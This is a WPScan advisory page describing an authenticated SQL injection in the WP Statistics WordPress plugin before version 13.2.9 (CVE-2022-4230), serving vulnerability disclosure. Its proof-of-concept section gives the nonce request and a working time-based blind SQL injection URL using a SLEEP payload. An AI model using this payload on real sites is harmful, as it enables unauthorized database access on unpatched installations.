WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Statistics < 13.2.9 - Authenticated SQLi

Description

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.

Proof of Concept

Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

Affects Plugins

wp-statistics
Fixed in version 13.2.9

References

CVE
CVE-2022-4230

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Jordy Versmissen

Submitter

Jordy Versmissen

Submitter website
https://www.j0vsec.com
Submitter twitter
j0v0x0
Verified

Yes

WPVDB ID
a0e40cfd-b217-481c-8fc4-027a0a023312

Timeline

Publicly Published

2022-12-27 (about 1 months ago)

Added

2022-12-27 (about 1 months ago)

Last Updated

2022-12-27 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin